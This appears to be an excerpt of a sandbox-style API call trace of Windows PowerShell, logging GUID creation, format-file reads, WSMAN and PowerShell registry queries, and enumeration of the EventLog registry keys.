	[0636.942] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xa8c228c3, Data2=0x8f72, Data3=0x4d8d, Data4=([0]=0x95, [1]=0xe3, [2]=0xa7, [3]=0xe4, [4]=0x47, [5]=0xdb, [6]=0x12, [7]=0x84))) returned 0x0
	[0636.942] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x7cac8f90, Data2=0x3ca5, Data3=0x4638, Data4=([0]=0x8e, [1]=0xb3, [2]=0xf, [3]=0xd3, [4]=0x84, [5]=0x23, [6]=0xf2, [7]=0xb))) returned 0x0
	[0636.942] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x171271ce, Data2=0xe3f0, Data3=0x47ff, Data4=([0]=0xa4, [1]=0xd0, [2]=0x78, [3]=0x85, [4]=0x3d, [5]=0x7a, [6]=0x39, [7]=0xde))) returned 0x0
	[0636.943] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x6489cfe8, Data2=0xd421, Data3=0x4c69, Data4=([0]=0x9f, [1]=0x23, [2]=0x9f, [3]=0x16, [4]=0x45, [5]=0x3e, [6]=0xdb, [7]=0xcd))) returned 0x0
	[0636.943] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x596cdbdf, Data2=0x70d2, Data3=0x4ed8, Data4=([0]=0xa7, [1]=0x6f, [2]=0xda, [3]=0xd7, [4]=0xdf, [5]=0xc2, [6]=0x49, [7]=0x12))) returned 0x0
	[0636.943] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x1bd3eacf, Data2=0x78d5, Data3=0x4840, Data4=([0]=0xbc, [1]=0x4b, [2]=0x21, [3]=0xa6, [4]=0x50, [5]=0x34, [6]=0xe0, [7]=0x36))) returned 0x0
	[0636.943] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x41a8e658, Data2=0x7504, Data3=0x4963, Data4=([0]=0xb1, [1]=0x40, [2]=0x87, [3]=0x8a, [4]=0x17, [5]=0xa3, [6]=0xac, [7]=0x14))) returned 0x0
	[0636.943] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xa3d535bf, Data2=0x89d3, Data3=0x4590, Data4=([0]=0x91, [1]=0x41, [2]=0xed, [3]=0xe4, [4]=0x98, [5]=0xb8, [6]=0x9c, [7]=0x88))) returned 0x0
	[0636.943] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x1f01fa94, Data2=0x43a4, Data3=0x40ca, Data4=([0]=0xbc, [1]=0xa9, [2]=0x20, [3]=0x4, [4]=0x1e, [5]=0xcd, [6]=0xf3, [7]=0x8b))) returned 0x0
	[0636.943] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x84341988, Data2=0x8805, Data3=0x45d8, Data4=([0]=0x81, [1]=0x1e, [2]=0xed, [3]=0x94, [4]=0xab, [5]=0x3b, [6]=0x7e, [7]=0x5))) returned 0x0
	[0636.943] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x6a5562ca, Data2=0xb51b, Data3=0x47fe, Data4=([0]=0xb6, [1]=0xa9, [2]=0x53, [3]=0xa, [4]=0x5d, [5]=0xc, [6]=0xaf, [7]=0x13))) returned 0x0
	[0636.944] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x9ea6cb76, Data2=0xf103, Data3=0x445b, Data4=([0]=0xa5, [1]=0xa1, [2]=0x23, [3]=0x6c, [4]=0x67, [5]=0x95, [6]=0xa7, [7]=0xc))) returned 0x0
	[0636.944] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x7dddf85e, Data2=0xeaae, Data3=0x4b9c, Data4=([0]=0x8a, [1]=0x9e, [2]=0xed, [3]=0x3, [4]=0xfc, [5]=0xc9, [6]=0xc4, [7]=0x57))) returned 0x0
	[0636.944] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xcde9408f, Data2=0x29b5, Data3=0x409e, Data4=([0]=0x97, [1]=0x91, [2]=0xa8, [3]=0x25, [4]=0xa, [5]=0xda, [6]=0x5d, [7]=0x66))) returned 0x0
	[0636.944] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x24fa2d14, Data2=0x3248, Data3=0x4503, Data4=([0]=0x91, [1]=0xd0, [2]=0x12, [3]=0x9a, [4]=0xe2, [5]=0x5e, [6]=0x79, [7]=0x9c))) returned 0x0
	[0636.944] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0636.944] GetFileType (hFile=0x2e4) returned 0x1
	[0636.944] SetErrorMode (uMode=0x1) returned 0x1
	[0636.944] GetFileType (hFile=0x2e4) returned 0x1
	[0636.944] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f53550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f53550*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0636.947] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f53550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f53550*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0636.947] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f53550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f53550*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0636.947] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f53550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f53550*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0636.947] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f53550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f53550*, lpNumberOfBytesRead=0x16cef8*=0x8b4, lpOverlapped=0x0) returned 1
	[0636.947] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f5296c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f5296c*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0636.947] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f53550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f53550*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0636.948] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf88 | out: phkResult=0x16cf88*=0x2e4) returned 0x0
	[0636.948] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf0c, lpData=0x0, lpcbData=0x16cf08*=0x0 | out: lpType=0x16cf0c*=0x1, lpData=0x0, lpcbData=0x16cf08*=0x56) returned 0x0
	[0636.948] CoTaskMemAlloc (cb=0x5a) returned 0x26f2b0
	[0636.948] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cedc, lpData=0x26f2b0, lpcbData=0x16ced8*=0x56 | out: lpType=0x16cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ced8*=0x56) returned 0x0
	[0636.948] CoTaskMemFree (pv=0x26f2b0) 
	[0636.948] RegCloseKey (hKey=0x2e4) returned 0x0
	[0636.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0636.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0636.948] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xb1e16e4d, Data2=0xb5c6, Data3=0x4db5, Data4=([0]=0x97, [1]=0x13, [2]=0x7b, [3]=0xbc, [4]=0xd5, [5]=0x12, [6]=0xd3, [7]=0x70))) returned 0x0
	[0636.949] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x42690ded, Data2=0x8ce1, Data3=0x4d41, Data4=([0]=0xad, [1]=0xc6, [2]=0xaa, [3]=0x5c, [4]=0xc6, [5]=0x7, [6]=0xfc, [7]=0xca))) returned 0x0
	[0636.949] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0636.949] GetFileType (hFile=0x2e4) returned 0x1
	[0636.949] SetErrorMode (uMode=0x1) returned 0x1
	[0636.949] GetFileType (hFile=0x2e4) returned 0x1
	[0636.949] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f91338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f91338*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0636.951] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f91338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f91338*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0636.951] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f91338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f91338*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0636.952] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f91338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f91338*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0636.952] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f91338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f91338*, lpNumberOfBytesRead=0x16cef8*=0xe98, lpOverlapped=0x0) returned 1
	[0636.952] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f90938, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f90938*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0636.952] ReadFile (in: hFile=0x2e4, lpBuffer=0x2f91338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2f91338*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0636.952] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf88 | out: phkResult=0x16cf88*=0x2e4) returned 0x0
	[0636.952] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf0c, lpData=0x0, lpcbData=0x16cf08*=0x0 | out: lpType=0x16cf0c*=0x1, lpData=0x0, lpcbData=0x16cf08*=0x56) returned 0x0
	[0636.952] CoTaskMemAlloc (cb=0x5a) returned 0x26f2b0
	[0636.952] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cedc, lpData=0x26f2b0, lpcbData=0x16ced8*=0x56 | out: lpType=0x16cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ced8*=0x56) returned 0x0
	[0636.953] CoTaskMemFree (pv=0x26f2b0) 
	[0636.953] RegCloseKey (hKey=0x2e4) returned 0x0
	[0636.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0636.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0636.953] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xadcb578, Data2=0xfdc6, Data3=0x4521, Data4=([0]=0x9c, [1]=0x4a, [2]=0x26, [3]=0x84, [4]=0xdc, [5]=0xf3, [6]=0x3, [7]=0xa2))) returned 0x0
	[0636.954] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xbb1a9bb2, Data2=0x643d, Data3=0x4f65, Data4=([0]=0xb6, [1]=0xd6, [2]=0x1f, [3]=0x68, [4]=0xd8, [5]=0x83, [6]=0x2e, [7]=0xa7))) returned 0x0
	[0640.464] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0640.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.464] CoTaskMemFree (pv=0x1aa050) 
	[0640.466] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0640.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.466] CoTaskMemFree (pv=0x1aa050) 
	[0640.467] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0640.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.467] CoTaskMemFree (pv=0x1aa050) 
	[0640.469] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0640.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.469] CoTaskMemFree (pv=0x1aa050) 
	[0640.481] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0640.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.481] CoTaskMemFree (pv=0x1aa050) 
	[0640.484] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0640.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.484] CoTaskMemFree (pv=0x1aa050) 
	[0640.484] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0640.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.484] CoTaskMemFree (pv=0x1aa050) 
	[0640.490] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d198 | out: phkResult=0x16d198*=0x2e4) returned 0x0
	[0640.494] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d09c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d098, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d09c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d098*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0640.494] CoTaskMemFree (pv=0x0) 
	[0640.495] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0640.495] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x0, lpValueName=0x1f1ef0, lpcchValueName=0x16d148, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d148, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0640.495] CoTaskMemFree (pv=0x1f1ef0) 
	[0640.495] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0640.495] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x1, lpValueName=0x1f1ef0, lpcchValueName=0x16d148, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d148, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0640.495] CoTaskMemFree (pv=0x1f1ef0) 
	[0640.495] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0640.495] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x2, lpValueName=0x1f1ef0, lpcchValueName=0x16d148, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d148, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0640.495] CoTaskMemFree (pv=0x1f1ef0) 
	[0640.496] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d12c, lpData=0x0, lpcbData=0x16d128*=0x0 | out: lpType=0x16d12c*=0x1, lpData=0x0, lpcbData=0x16d128*=0x8) returned 0x0
	[0640.496] CoTaskMemAlloc (cb=0xc) returned 0x201d80
	[0640.496] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d0fc, lpData=0x201d80, lpcbData=0x16d0f8*=0x8 | out: lpType=0x16d0fc*=0x1, lpData="2.0", lpcbData=0x16d0f8*=0x8) returned 0x0
	[0640.496] CoTaskMemFree (pv=0x201d80) 
	[0643.532] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0e8 | out: phkResult=0x16d0e8*=0x2e4) returned 0x0
	[0643.532] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16cfec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16cfe8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16cfec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16cfe8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0643.532] CoTaskMemFree (pv=0x0) 
	[0643.532] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0643.532] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x0, lpValueName=0x1f1ef0, lpcchValueName=0x16d098, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d098, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0643.532] CoTaskMemFree (pv=0x1f1ef0) 
	[0643.532] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0643.532] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x1, lpValueName=0x1f1ef0, lpcchValueName=0x16d098, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d098, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0643.532] CoTaskMemFree (pv=0x1f1ef0) 
	[0643.532] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0643.532] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x2, lpValueName=0x1f1ef0, lpcchValueName=0x16d098, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d098, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0643.533] CoTaskMemFree (pv=0x1f1ef0) 
	[0643.533] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d07c, lpData=0x0, lpcbData=0x16d078*=0x0 | out: lpType=0x16d07c*=0x1, lpData=0x0, lpcbData=0x16d078*=0x8) returned 0x0
	[0643.533] CoTaskMemAlloc (cb=0xc) returned 0x25f210
	[0643.533] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d04c, lpData=0x25f210, lpcbData=0x16d048*=0x8 | out: lpType=0x16d04c*=0x1, lpData="2.0", lpcbData=0x16d048*=0x8) returned 0x0
	[0643.533] CoTaskMemFree (pv=0x25f210) 
	[0643.533] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0643.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0643.534] CoTaskMemFree (pv=0x1aa050) 
	[0645.632] CoTaskMemAlloc (cb=0x104) returned 0x1aa050
	[0645.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa050, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0645.632] CoTaskMemFree (pv=0x1aa050) 
	[0645.637] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d118 | out: phkResult=0x16d118*=0x2e8) returned 0x0
	[0645.642] RegQueryInfoKeyW (in: hKey=0x2e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d08c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d088, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d08c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d088*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0645.642] CoTaskMemFree (pv=0x0) 
	[0645.643] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0645.643] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x0, lpName=0x1f1ef0, lpcchName=0x16d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0645.643] CoTaskMemFree (pv=0x1f1ef0) 
	[0645.643] CoTaskMemFree (pv=0x0) 
	[0645.643] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0645.643] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x1, lpName=0x1f1ef0, lpcchName=0x16d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0645.643] CoTaskMemFree (pv=0x1f1ef0) 
	[0645.643] CoTaskMemFree (pv=0x0) 
	[0645.643] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0645.643] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x2, lpName=0x1f1ef0, lpcchName=0x16d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0645.643] CoTaskMemFree (pv=0x1f1ef0) 
	[0645.643] CoTaskMemFree (pv=0x0) 
	[0645.643] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0645.643] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x3, lpName=0x1f1ef0, lpcchName=0x16d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0645.643] CoTaskMemFree (pv=0x1f1ef0) 
	[0645.643] CoTaskMemFree (pv=0x0) 
	[0645.643] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0645.643] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x4, lpName=0x1f1ef0, lpcchName=0x16d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0645.643] CoTaskMemFree (pv=0x1f1ef0) 
	[0645.643] CoTaskMemFree (pv=0x0) 
	[0645.643] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0645.643] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x5, lpName=0x1f1ef0, lpcchName=0x16d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0645.644] CoTaskMemFree (pv=0x1f1ef0) 
	[0645.644] CoTaskMemFree (pv=0x0) 
	[0645.644] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0645.644] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x6, lpName=0x1f1ef0, lpcchName=0x16d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0645.644] CoTaskMemFree (pv=0x1f1ef0) 
	[0645.644] CoTaskMemFree (pv=0x0) 
	[0645.644] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0645.644] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x7, lpName=0x1f1ef0, lpcchName=0x16d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0645.644] CoTaskMemFree (pv=0x1f1ef0) 
	[0645.644] CoTaskMemFree (pv=0x0) 
	[0645.644] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0645.644] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x8, lpName=0x1f1ef0, lpcchName=0x16d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0645.644] CoTaskMemFree (pv=0x1f1ef0) 
	[0645.644] CoTaskMemFree (pv=0x0) 
	[0645.644] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x324) returned 0x0
